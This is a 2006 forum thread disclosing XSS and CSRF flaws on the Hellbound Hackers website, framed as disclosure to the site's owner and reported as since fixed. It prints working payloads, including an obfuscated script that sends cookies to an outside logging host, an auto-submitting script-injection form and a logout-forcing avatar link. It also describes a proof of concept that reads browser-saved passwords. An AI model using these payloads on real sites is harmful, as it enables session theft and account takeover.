Critical Security.NET: Hellbound Hackers - 4 XSS & 1 CSRF (bug) and one awesome XSS - must read


Hellbound Hackers - 4 XSS & 1 CSRF (bug) and one awesome XSS - must read

#1 Sid (Group: Administrators, London, UK)

Posted 22 August 2006 - 11:10 AM

Update: all XSS that I've listed in this thread are fixed.

I have informed system_meltdown, one of their admins (I'm pretty sure he's an admin), as well as Mr Cheese (their owner). The former said he knew about them and didn't care; the latter said he'd fix it but didn't. That was on the 14th.

To be honest these aren't major flaws, as they tie their sessions to IPs like we do, but they could be used for other things than just stealing cookies. I could use a JS-based port scanner to try to find their router, then see if I could identify the router (different routers have different unique images), and maybe if I had a list of vulnerable routers I could change settings on them (DMZ settings, for instance). Or maybe I could use AJAX to read their PMs and forward the info to me, or I could force their account to send 100s of PMs to others; whatever I wanted, almost.

Anyway... the XSS ones first. You may need an hbh account to view these, btw.
Basic 8 can be demoed with the following code:
<form action="http://www.hellboundhackers.org/challenges/basic8/secure-area.php" method="post">
Username: Drake<br><br>
Password: <input type='text' name='password' value="<script>alert(document.cookie)</script>"><br>
<input type='submit' value='Login!'>
</form>
<script>document.forms[0].submit()</script>


The second is in basic 9 and uses GET instead of POST. For some reason I couldn't get script tags into the page (maybe hbh implements a filter to block the string "<script>"). Either way, I resorted to using the onmouseover event handler on an image. Here's the code I wanted to inject:
<img onmouseover="i=document.createElement('img');i.src='http://ccl.whiteacid.org/log.php?648425Your cookies could be here';b=document.getElementsByTagName('body').item(0);b.appendChild(i)">

but since quotes are escaped I had to use JavaScript's String.fromCharCode(), so I ended up injecting:
http://www.hellboundhackers.org/challenges/basic9/files/search.php?search=%3Cimg%20onmouseover=eval(String.fromCharCode(105,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,105,109,103,39,41,59,105,46,115,114,99,61,39,104,116,116,112,58,47,47,99,99,108,46,119,104,105,116,101,97,99,105,100,46,111,114,103,47,108,111,103,46,112,104,112,63,54,52,56,52,50,53,89,111,117,114,32,99,111,111,107,105,101,115,32,99,111,117,108,100,32,98,101,32,104,101,114,101,39,59,98,61,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,98,111,100,121,39,41,46,105,116,101,109,40,48,41,59,98,46,97,112,112,101,110,100,67,104,105,108,100,40,105,41)) >&submit=Search%21


Another XSS:
http://www.hellbound...e)%3C/script%3E
That one works because $_SERVER['PHP_SELF'] can be poisoned with the script code, and when echoed executes the JS. That one works on any page where the shoutbox is visible.

Another XSS (hover over shoutbox form to use):
http://www.hellbound...=alert(1337);//

A CSRF flaw is in the profile page. I can set my avatar to for instance:
http://www.hellbound....php?logout=yes
then anyone looking at my profile gets logged out. Or I could set it to a page where I want to increase the hitcount. If I knew the admin section I could possibly even use that to elevate my privs.

#2 ywfbi (Group: Guests)

Posted 22 August 2006 - 11:43 AM

Impressive, glad you're on our side :D

#3 Sid

Posted 23 August 2006 - 05:29 AM

Update: all XSS that I've listed in this thread are fixed.
Our side? I'm on their side too. I was hoping full disclosure would make them fix the flaws quicker. I'm on their IRC just as much as on the HTS IRC, and the only reason I don't use their forums is that I don't like their forum software.

[posts merged]

Here's the super XSS attack which steals their passwords in plaintext.
I read a post by RSnake today which got me working on a new XSS.

If Firefox (presumably other browsers too) remembers your username and password, then this XSS will give you back your password (I couldn't be bothered doing the username) in an alert box. It could of course equally well send the info to me.

Obviously this only works if you have set your browser to remember your login name and password. If you want to test this, go to hbh and log in with any info from bugmenot. Firefox will ask you if you want to remember the info; press yes.

Then go here.
I used tinyurl cos IPB fucks with the formatting. To see the actual url go there and look at the address bar.

Hover over the shoutbox. Now your browser will freeze for a few seconds, then it'll go back to normal. Now just wait a few seconds and you should get a few alert boxes with your password in them. If not, get rid of the boxes, wait some more and again you'll get alerts; this time they should have the password in them.

It's 5:25am here, so I won't explain the code. It's really not that tricky.

Edit: I could try to tie this into one of the XSSes I found earlier which gets executed automatically, but I can't be bothered. This is a PoC, not an evil XSS.

Edit: Lockdown, I've merged the posts now.

#4 Lockdown (Group: Members)

Posted 23 August 2006 - 05:34 AM

Just because you're an uber-1337 XSS-er does not mean you have the right to double post ;)

Dude, sweet shit.

#5 Sid

Posted 23 August 2006 - 05:57 AM

Sent just now to Mr_Cheese:

Quote

I recommend you do fix those flaws. I've successfully made an XSS which can detect your password in plaintext, given one caveat. If you have set your browser to remember your username and password then I can use JS to read that. So... I've got a PoC here. It doesn't send me anything. Open the url, then hover your mouse over the shoutbox. Your browser will then freeze for about 5 seconds (while it's doing synchronous ajax); it'll eventually unfreeze and it'll set an interval to give you an alert with your password every 10 seconds. Oh, it logs you out too, otherwise it can't get to the login form.

I recommend you close all other tabs first, just in case it crashes Firefox. If you are paranoid and want to be sure it doesn't send me anything, or if you have not set Firefox to save the passwords, then just log in with a non-existent account and FF will ask you if you want to save the details. Press yes, then run the XSS.

I could have made it use another XSS hole, not the shoutbox one, but it's a PoC so I didn't want to make it too easy for people to edit for malicious purposes.


#6 digi7al64 (Group: Administrators)
Posted 23 August 2006 - 05:59 AM

Very nice work WhiteAcid.

I also suggest that you could create some code that is triggered when the submission form is submitted, so even if the form is not pre-populated you can still catch the data on submission.

#7 Sid

Posted 23 August 2006 - 06:00 AM

I'll leave that up to Mr. malicious, this is a PoC.

#8 rab (Group: Members)

Posted 23 August 2006 - 08:47 PM

;o <3, i love it. Great ideas
